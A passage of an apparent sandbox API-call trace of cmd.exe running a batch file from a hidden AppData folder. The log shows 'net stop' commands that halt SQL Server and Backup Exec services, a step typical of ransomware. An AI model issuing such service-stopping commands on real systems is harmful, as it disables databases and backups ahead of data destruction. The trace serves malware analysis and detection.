0x3e0000 [0202.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.542] GetEnvironmentStringsW () returned 0x3f8408* [0202.542] GetProcessHeap () returned 0x3e0000 [0202.542] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.542] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.542] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0202.675] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0202.676] CloseHandle (hObject=0x74) returned 1 [0202.676] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0202.676] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0202.676] GetProcessHeap () returned 0x3e0000 [0202.676] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.676] GetEnvironmentStringsW () returned 0x3f8408* [0202.676] GetProcessHeap () returned 0x3e0000 [0202.676] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.676] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.676] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0202.676] GetProcessHeap () returned 0x3e0000 [0202.676] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.676] GetEnvironmentStringsW () returned 0x3f8408* [0202.677] GetProcessHeap () returned 0x3e0000 [0202.677] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.677] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.677] GetProcessHeap () returned 0x3e0000 [0202.677] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0202.677] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0202.677] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.677] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.677] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0202.677] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.677] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0202.678] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.678] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0202.678] SetConsoleInputExeNameW () returned 0x1 [0202.678] GetConsoleOutputCP () returned 0x1b5 [0202.678] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0202.678] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0202.678] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0202.678] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.678] SetFilePointer (in: hFile=0x74, lDistanceToMove=3478, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd96 [0202.679] GetProcessHeap () returned 0x3e0000 [0202.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0202.679] GetProcessHeap () returned 0x3e0000 [0202.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0202.679] GetProcessHeap () returned 0x3e0000 [0202.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0202.679] GetProcessHeap () returned 0x3e0000 [0202.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0202.679] GetProcessHeap () returned 0x3e0000 [0202.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0202.679] GetProcessHeap () returned 0x3e0000 [0202.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0202.679] GetProcessHeap () returned 0x3e0000 [0202.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0202.679] GetProcessHeap () returned 0x3e0000 [0202.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0202.679] GetProcessHeap () returned 0x3e0000 [0202.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0202.679] GetProcessHeap () returned 0x3e0000 [0202.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0202.679] GetProcessHeap () returned 0x3e0000 [0202.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0202.679] GetProcessHeap () returned 0x3e0000 [0202.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0202.679] GetProcessHeap () returned 0x3e0000 [0202.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0202.679] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.679] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd96 [0202.679] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xb2b, lpOverlapped=0x0) returned 1 [0202.679] SetFilePointer (in: hFile=0x74, lDistanceToMove=3518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xdbe [0202.679] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=40, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQLFDLauncher$SYSTEM_BGC /y\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 40 [0202.680] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.680] GetFileType (hFile=0x74) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.680] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xdbe [0202.680] GetProcessHeap () returned 0x3e0000 [0202.680] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0202.680] GetProcessHeap () returned 0x3e0000 [0202.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0202.683] _tell (_FileHandle=3) returned 3518 [0202.683] _close (_FileHandle=3) returned 0 [0202.683] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0202.683] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0202.683] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0202.683] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0202.683] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0202.683] _wcsicmp (_String1="net", _String2="CD") returned 11 [0202.683] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0202.683] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0202.683] _wcsicmp (_String1="net", _String2="REN") returned -4 [0202.684] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0202.684] _wcsicmp (_String1="net", _String2="SET") returned -5 [0202.684] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0202.684] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0202.684] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0202.684] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0202.684] _wcsicmp (_String1="net", _String2="MD") returned 1 [0202.684] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0202.684] _wcsicmp (_String1="net", _String2="RD") returned -4 [0202.684] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0202.684] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0202.684] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0202.684] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0202.684] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0202.684] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0202.684] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0202.684] _wcsicmp (_String1="net", _String2="VER") returned -8 [0202.684] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0202.684] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0202.684] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0202.684] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0202.684] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0202.684] _wcsicmp (_String1="net", _String2="START") returned -5 [0202.684] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0202.684] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0202.684] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0202.684] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0202.684] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0202.684] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0202.684] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0202.684] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0202.684] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0202.684] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0202.685] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0202.685] SetErrorMode (uMode=0x0) returned 0x1 [0202.685] GetProcessHeap () returned 0x3e0000 [0202.685] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0202.685] GetProcessHeap () returned 0x3e0000 [0202.685] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0202.685] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.685] GetProcessHeap () returned 0x3e0000 [0202.685] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0202.685] GetProcessHeap () returned 0x3e0000 [0202.685] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0202.686] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.686] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.686] GetLastError () returned 0x2 [0202.687] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.687] GetLastError () returned 0x2 [0202.687] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.687] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.688] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.688] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.688] GetLastError () returned 0x2 [0202.688] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.688] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.689] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.689] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0202.689] SetErrorMode (uMode=0x0) returned 0x1 [0202.689] GetProcessHeap () returned 0x3e0000 [0202.689] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0202.689] GetProcessHeap () returned 0x3e0000 [0202.689] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0202.690] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.690] GetProcessHeap () returned 0x3e0000 [0202.690] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0202.690] GetProcessHeap () returned 0x3e0000 [0202.690] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0202.690] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.691] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.691] GetLastError () returned 0x2 [0202.691] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.691] GetLastError () returned 0x2 [0202.692] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.692] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0202.692] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0202.692] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.693] GetLastError () returned 0x2 [0202.693] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0202.693] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0202.693] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.694] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0202.694] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0202.694] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0202.694] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.694] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLFDLauncher$SYSTEM_BGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLFDLauncher$SYSTEM_BGC /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQLFDLauncher$SYSTEM_BGC /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x55c, dwThreadId=0x588)) returned 1 [0202.698] CloseHandle (hObject=0x74) returned 1 [0202.698] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0202.698] GetProcessHeap () returned 0x3e0000 [0202.698] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.698] GetEnvironmentStringsW () returned 0x3f8408* [0202.698] GetProcessHeap () returned 0x3e0000 [0202.698] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.698] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.698] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0202.827] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0202.827] CloseHandle (hObject=0x78) returned 1 [0202.827] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0202.827] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0202.827] GetProcessHeap () returned 0x3e0000 [0202.827] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.827] GetEnvironmentStringsW () returned 0x3f8408* [0202.827] GetProcessHeap () returned 0x3e0000 [0202.827] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.827] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.827] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0202.827] GetProcessHeap () returned 0x3e0000 [0202.827] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.827] GetEnvironmentStringsW () returned 0x3f8408* [0202.828] GetProcessHeap () returned 0x3e0000 [0202.828] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.828] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.828] GetProcessHeap () returned 0x3e0000 [0202.828] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0202.828] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0202.828] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.828] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0202.828] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.828] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0202.828] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.828] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0202.828] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.828] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0202.829] SetConsoleInputExeNameW () returned 0x1 [0202.829] GetConsoleOutputCP () returned 0x1b5 [0202.829] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0202.829] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0202.829] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0202.829] _get_osfhandle (_FileHandle=3) returned 0x78 [0202.829] SetFilePointer (in: hFile=0x78, lDistanceToMove=3518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xdbe [0202.829] GetProcessHeap () returned 0x3e0000 [0202.829] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0202.829] GetProcessHeap () returned 0x3e0000 [0202.829] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0202.829] GetProcessHeap () returned 0x3e0000 [0202.829] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0202.829] GetProcessHeap () returned 0x3e0000 [0202.829] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0202.830] GetProcessHeap () returned 0x3e0000 [0202.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0202.830] GetProcessHeap () returned 0x3e0000 [0202.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0202.830] GetProcessHeap () returned 0x3e0000 [0202.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0202.830] GetProcessHeap () returned 0x3e0000 [0202.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0202.830] GetProcessHeap () returned 0x3e0000 [0202.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0202.830] GetProcessHeap () returned 0x3e0000 [0202.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0202.830] GetProcessHeap () returned 0x3e0000 [0202.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0202.830] GetProcessHeap () returned 0x3e0000 [0202.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0202.830] GetProcessHeap () returned 0x3e0000 [0202.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0202.830] _get_osfhandle (_FileHandle=3) returned 0x78 [0202.830] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xdbe [0202.830] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xb03, lpOverlapped=0x0) returned 1 [0202.830] SetFilePointer (in: hFile=0x78, lDistanceToMove=3546, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xdda [0202.830] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=28, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$BKUPEXEC /y\r\nTEM_BGC /y\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 28 [0202.831] _get_osfhandle (_FileHandle=3) returned 0x78 [0202.831] GetFileType (hFile=0x78) returned 0x1 [0202.831] _get_osfhandle (_FileHandle=3) returned 0x78 [0202.831] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xdda [0202.831] GetProcessHeap () returned 0x3e0000 [0202.831] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0202.831] GetProcessHeap () returned 0x3e0000 [0202.831] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0202.834] _tell (_FileHandle=3) returned 3546 [0202.834] _close (_FileHandle=3) returned 0 [0202.834] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0202.834] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0202.834] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0202.834] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0202.834] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0202.834] _wcsicmp (_String1="net", _String2="CD") returned 11 [0202.834] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0202.834] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0202.834] _wcsicmp (_String1="net", _String2="REN") returned -4 [0202.834] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0202.834] _wcsicmp (_String1="net", _String2="SET") returned -5 [0202.834] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0202.834] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0202.834] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0202.834] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0202.834] _wcsicmp (_String1="net", _String2="MD") returned 1 [0202.835] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0202.835] _wcsicmp (_String1="net", _String2="RD") returned -4 [0202.835] 